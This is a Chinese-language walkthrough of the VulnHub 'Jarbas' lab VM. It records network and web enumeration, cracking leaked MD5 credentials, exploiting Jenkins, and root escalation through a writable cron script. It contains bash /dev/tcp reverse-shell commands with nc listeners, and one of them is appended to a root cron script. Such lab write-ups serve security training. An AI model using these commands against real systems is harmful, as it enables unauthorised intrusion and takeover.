Jabrbas
地址:https://www.vulnhub.com/entry/jarbas-1,232/
1、主机发现
sudo nmap -sn 192.168.239.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:33 CST
Nmap scan report for 192.168.239.1
Host is up (0.00071s latency).
MAC Address: 00:50:56:C0:00:03 (VMware)
Nmap scan report for 192.168.239.132
Host is up (0.00063s latency).
MAC Address: 00:0C:29:34:B4:7F (VMware)
Nmap scan report for 192.168.239.254
Host is up (0.00010s latency).
MAC Address: 00:50:56:ED:A6:56 (VMware)
Nmap scan report for 192.168.239.129
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 28.01 seconds
2、端口扫描
-
扫描全端口
nmap --min-rate 10000 -p- 192.168.239.132 Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:35 CST Nmap scan report for 192.168.239.132 Host is up (0.0011s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql 8080/tcp open http-proxy MAC Address: 00:0C:29:34:B4:7F (VMware) Nmap done: 1 IP address (1 host up) scanned in 17.11 seconds再扫一遍
┌──(de1te㉿de1te)-[~] └─$ sudo nmap --min-rate 10000 -p- 192.168.239.132 Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:36 CST Nmap scan report for 192.168.239.132 Host is up (0.000067s latency). Not shown: 65531 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql 8080/tcp open http-proxy MAC Address: 00:0C:29:34:B4:7F (VMware) Nmap done: 1 IP address (1 host up) scanned in 14.89 seconds开放了 22,80,3306,8080 端口
-
查看开放端口的协议版本和系统版本
sudo nmap -sT -sV -O -p 22,80,3306,8080 192.168.239.132Nmap scan report for 192.168.239.132 Host is up (0.00040s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) 3306/tcp open mysql MariaDB (unauthorized) 8080/tcp open http Jetty 9.4.z-SNAPSHOT MAC Address: 00:0C:29:34:B4:7F (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Network Distance: 1 hop OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.09 seconds -
看看有啥简单漏洞
sudo nmap --script=vuln -p 22,80,3306,8080 192.168.239.132Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-27 16:42 CST Nmap scan report for 192.168.239.132 Host is up (0.00027s latency). PORT STATE SERVICE 22/tcp open ssh 80/tcp open http |_http-dombased-xss: Couldn't find any DOM based XSS. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities. |_http-trace: TRACE is enabled |_http-csrf: Couldn't find any CSRF vulnerabilities. | http-enum: |_ /icons/: Potentially interesting folder w/ directory listing 3306/tcp open mysql 8080/tcp open http-proxy | http-enum: |_ /robots.txt: Robots file MAC Address: 00:0C:29:34:B4:7F (VMware) Nmap done: 1 IP address (1 host up) scanned in 38.03 seconds发现8080端口下有robots,看看有啥
# we don't want robots to click "build" links User-agent: * Disallow: /没啥信息
总结一下:80和8080端口开着,首先看一下web方向吧
3、web方向
-
审一下网站
80端口下:
8080端口下
一个登录页面,一般有三种方式获取登录账户和密码
- 默认密码
- 网站中存在泄露信息
- 爆破
-
目录爆破
sudo gobuster dir -u 192.168.239.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txtGobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.239.132 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Timeout: 10s =============================================================== 2023/03/27 17:00:06 Starting gobuster in directory enumeration mode =============================================================== Progress: 20023 / 62285 (32.15%)[ERROR] 2023/03/27 17:00:09 [!] parse "http://192.168.239.132/error\x1f_log": net/url: invalid control character in URL Progress: 61964 / 62285 (99.48%) =============================================================== 2023/03/27 17:00:14 Finished ===============================================================没啥东西,加几个文件后缀试一下
sudo gobuster dir -u 192.168.239.132 -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -x html,php=============================================================== Gobuster v3.5 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://192.168.239.132 [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.5 [+] Extensions: html,php [+] Timeout: 10s =============================================================== 2023/03/27 17:01:30 Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 32808] /access.html (Status: 200) [Size: 359] /.html (Status: 403) [Size: 207] Progress: 66397 / 186855 (35.53%)[ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/besalu\t.html": net/url: invalid control character in URL [ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/besalu\t.php": net/url: invalid control character in URL Progress: 70235 / 186855 (37.59%)[ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log": net/url: invalid control character in URL [ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log.html": net/url: invalid control character in URL [ERROR] 2023/03/27 17:01:39 [!] parse "http://192.168.239.132/error\x1f_log.php": net/url: invalid control character in URL /.html (Status: 403) [Size: 207] /index.html (Status: 200) [Size: 32808] /.html (Status: 403) [Size: 207] Progress: 183153 / 186855 (98.02%) =============================================================== 2023/03/27 17:01:54 Finished ===============================================================有个access.html 页面,看一下
Creds encrypted in a safe way! tiago:5978a63b4654c73c60fa24f836386d87 trindade:f463f63616cb3f1e81ce46b39f882fd5 eder:9b38e2b1e8b12f426b0d208a7ab6cb98emm,后面想md5加密
sudo hash-identifier '5978a63b4654c73c60fa24f836386d87'Possible Hashs: [+] MD5 [+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))果然是MD5
解密一下
5978a63b4654c73c60fa24f836386d87:italia99 9b38e2b1e8b12f426b0d208a7ab6cb98:vipsu f463f63616cb3f1e81ce46b39f882fd5:marianna现在有了一下信息
tiago : italia99 trindade : vipsu eder : marianna都不行,排列组合一下
eder vipsu 可以或者,集束炸弹爆破一下
-
burpsuite
结果:
eder---->vipsu
-
-
jenkins 漏洞利用
应该是这个:CVE-2019-10352
漏洞利用:
反弹shell
/bin/bash -i >& /dev/tcp/192.168.239.129/4444 0>&1开启端口监听:
sudo nc -lvnp 4444获得反弹shell
bash-4.2$ ls
4、提权
bash-4.2$ whoami # 查看当前用户
whoami
jenkins
bash-4.2$ uname -a # 查看系统版本
uname -a
Linux jarbas 3.10.0-693.21.1.el7.x86_64 #1 SMP Wed Mar 7 19:03:37 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
bash-4.2$ sudo -l # 查看当前用户权限
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of oth ers.
#2) Think before you type.
#3) With great power comes great responsibility.
sudo: no tty present and no askpass program specified
bash-4.2$ cat /etc/passwd # 查看所以用户
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:997:User for polkitd:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
eder:x:1000:1000:Eder Luiz:/home/eder:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
jenkins:x:997:995:Jenkins Automation Server:/var/lib/jenkins:/bin/false
bash-4.2$ cat /etc/crontab # 查看自动任务脚本
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
# For details see man 4 crontabs
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
*/5 * * * * root /etc/script/CleaningScript.sh >/dev/null 2>&1
# 查看自动任务脚本
cat /etc/script/CleaningScript.sh
#!/bin/bash
rm -rf /var/log/httpd/access_log.txt
# 看看能不能写入
cho '/bin/bash -i >& /dev/tcp/192.168.239.129/4443 0>&1' >>/etc/script/CleaningScript.sh
成功:
┌──(de1te㉿de1te)-[~] │└─$
└─$ sudo nc -lvnp 4443 │┌──(de1te㉿de1te)-[~]
[sudo] de1te 的密码: │└─$ ip a
listening on [any] 4443 ... │1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
connect to [192.168.239.129] from (UNKNOWN) [192.168.239.132] 33726 │ link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
bash: no job control in this shell │ inet 127.0.0.1/8 scope host lo
[root@jarbas ~]# │ valid_lft forever preferred_lft forever
│ inet6 ::1/128 scope host
[root@jarbas ~]# ls │ valid_lft forever preferred_lft forever
ls │2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
flag.txt │ link/ether 00:0c:29:4c:a6:2d brd ff:ff:ff:ff:ff:ff
[root@jarbas ~]# cat flag.txt │ inet 192.168.239.129/24 brd 192.168.239.255 scope global dynamic noprefixroute eth0
cat flag.txt │ valid_lft 903sec preferred_lft 903sec
Hey! │ inet6 fe80::20c:29ff:fe4c:a62d/64 scope link noprefixroute
│ valid_lft forever preferred_lft forever
Congratulations! You got it! I always knew you could do it! │
This challenge was very easy, huh? =) │┌──(de1te㉿de1te)-[~]
│└─$
Thanks for appreciating this machine. │
│
@tiagotvrs │
[root@jarbas ~]#